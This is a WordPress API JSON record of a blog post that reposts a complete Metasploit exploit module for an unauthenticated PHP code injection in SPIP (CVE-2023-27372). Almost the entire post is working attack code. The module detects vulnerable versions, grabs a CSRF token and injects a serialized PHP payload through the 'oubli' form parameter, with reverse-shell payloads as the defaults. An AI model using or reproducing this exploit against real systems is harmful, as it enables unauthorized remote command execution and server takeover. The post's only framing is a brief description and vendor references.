{"id":40498,"date":"2023-04-18T22:09:04","date_gmt":"2023-04-18T18:09:04","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171921\/spip_rce_form.rb.txt"},"modified":"2023-04-19T21:31:23","modified_gmt":"2023-04-19T17:01:23","slug":"spip-remote-command-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/spip-remote-command-execution\/","title":{"rendered":"SPIP Remote Command Execution"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n

include Msf::Exploit::CmdStager
\ninclude Msf::Exploit::Remote::HttpClient
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘SPIP form PHP Injection’,
\n‘Description’ => %q{
\nThis module exploits a PHP code injection in SPIP. The vulnerability exists in the
\noubli parameter and allows an unauthenticated user to execute arbitrary commands
\nwith web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions
\nare <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
\n},
\n‘Author’ => [
\n‘coiffeur’, # Initial discovery
\n‘Laluka’, # PoC
\n‘Julien Voisin’ # MSF module
\n],
\n‘License’ => MSF_LICENSE,
\n‘References’ => [
\n[ ‘URL’, ‘https:\/\/blog.spip.net\/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html’ ],
\n[ ‘URL’, ‘https:\/\/therealcoiffeur.com\/c11010’ ],
\n[ ‘CVE’, ‘2023-27372’ ],
\n],
\n‘Privileged’ => false,
\n‘Platform’ => %w[php linux unix],
\n‘Arch’ => [ARCH_PHP, ARCH_CMD],
\n‘Targets’ => [
\n[
\n‘Automatic (PHP In-Memory)’,
\n{
\n‘Platform’ => ‘php’,
\n‘Arch’ => ARCH_PHP,
\n‘DefaultOptions’ => { ‘PAYLOAD’ => ‘php\/meterpreter\/reverse_tcp’ },
\n‘Type’ => :php_memory,
\n‘Payload’ => {
\n‘BadChars’ => “\\x22\\x00”
\n}
\n}
\n],
\n[
\n‘Automatic (Unix In-Memory)’,
\n{
\n‘Platform’ => ‘unix’,
\n‘Arch’ => ARCH_CMD,
\n‘DefaultOptions’ => { ‘PAYLOAD’ => ‘cmd\/unix\/reverse’ },
\n‘Type’ => :unix_memory,
\n‘Payload’ => {
\n‘BadChars’ => “\\x22\\x00\\x27”
\n}
\n}
\n],
\n],
\n‘Notes’ => {
\n‘Stability’ => [ CRASH_SAFE ],
\n‘Reliability’ => [ REPEATABLE_SESSION ],
\n‘SideEffects’ => [IOC_IN_LOGS]\n},
\n‘DefaultTarget’ => 0,
\n‘DisclosureDate’ => ‘2023-02-27’
\n)
\n)<\/p>\n

register_options(
\n[
\nOptString.new(‘TARGETURI’, [true, ‘The base path to SPIP application’, ‘\/’]),
\n]\n)
\nend<\/p>\n

def check
\nuri = normalize_uri(target_uri.path, ‘spip.php’)
\nres = send_request_cgi({ ‘uri’ => uri.to_s })<\/p>\n

return Exploit::CheckCode::Unknown(‘Target is unreachable.’) unless res
\nreturn Exploit::CheckCode::Unknown(“Target responded with unexpected HTTP response code: #{res.code}”) unless res.code == 200<\/p>\n

version_string = res.get_html_document.at(‘head\/meta[@name=”generator”]\/@content’)&.text
\nreturn Exploit::CheckCode::Unknown(‘Unable to find the version string on the page: spip.php’) unless version_string =~ \/SPIP (.*)\/<\/p>\n

version = ::Regexp.last_match(1)<\/p>\n

if version.nil? && res.headers[‘Composed-By’] =~ \/SPIP (.*) @\/
\nversion = ::Regexp.last_match(1)
\nend<\/p>\n

return Exploit::CheckCode::Unknown(‘Unable to determine the version of SPIP’) unless version<\/p>\n

print_status(“SPIP Version detected: #{version}”)<\/p>\n

rversion = Rex::Version.new(version)
\nif rversion >= Rex::Version.new(‘4.2.0’)
\nif rversion < Rex::Version.new(‘4.2.1’)
\nreturn Exploit::CheckCode::Appears
\nend
\nelsif rversion >= Rex::Version.new(‘4.1.0’)
\nif rversion < Rex::Version.new(‘4.1.18’)
\nreturn Exploit::CheckCode::Appears
\nend
\nelsif rversion >= Rex::Version.new(‘4.0.0’)
\nif rversion < Rex::Version.new(‘4.0.10’)
\nreturn Exploit::CheckCode::Appears
\nend
\nelsif rversion >= Rex::Version.new(‘3.2.0’)
\nif rversion < Rex::Version.new(‘3.2.18’)
\nreturn Exploit::CheckCode::Appears
\nend
\nend<\/p>\n

return Exploit::CheckCode::Safe
\nend<\/p>\n

def execute_command(cmd, args = {})
\nsend_request_cgi(
\n{
\n‘uri’ => args[‘uri’],
\n‘method’ => ‘POST’,
\n‘vars_post’ => {
\n‘page’ => ‘spip_pass’,
\n‘lang’ => ‘fr’,
\n‘formulaire_action’ => ‘oubli’,
\n‘formulaire_action_args’ => args[‘csrf’],
\n‘oubli’ => cmd
\n}
\n}
\n)
\nend<\/p>\n

def exploit
\nuri = normalize_uri(target_uri.path, ‘spip.php?page=spip_pass&lang=fr’)
\nres = send_request_cgi({ ‘uri’ => uri })<\/p>\n

fail_with(Msf::Exploit::Failure::Unreachable, “The request to uri: #{uri} did not respond”) unless res
\nfail_with(Msf::Exploit::Failure::UnexpectedReply, “Got an http code that isn’t 200: #{res.code}, when sending a request to uri: #{uri}”) unless res&.code == 200<\/p>\n

csrf = ”
\nunless (node = res.get_html_document.xpath(‘\/\/form\/\/input[@name=”formulaire_action_args”]’)).empty?
\ncsrf = node.first[‘value’]\nend<\/p>\n

print_status(“Got anti-csrf token: #{csrf}”)<\/p>\n

print_status(“#{rhost}:#{rport} – Attempting to exploit…”)<\/p>\n

oubli = ”
\ncase target[‘Type’]\nwhen :php_memory
\noubli = “s:#{payload.encoded.length + 6 + 2}:\\”<?php #{payload.encoded}?>\\”;”
\nwhen :unix_memory
\noubli = “s:#{payload.encoded.length + 14 + 4}:\\”<?php system(‘#{payload.encoded}’)?>\\”;”
\nend
\nexecute_command(oubli, { ‘uri’ => uri, ‘csrf’ => csrf })
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘SPIP form PHP Injection’, ‘Description’ => %q{ This module exploits a PHP code injection in SPIP. The vulnerability exists in the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40498","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40498"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40498\/revisions"}],"predecessor-version":[{"id":40559,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40498\/revisions\/40559"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40498"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}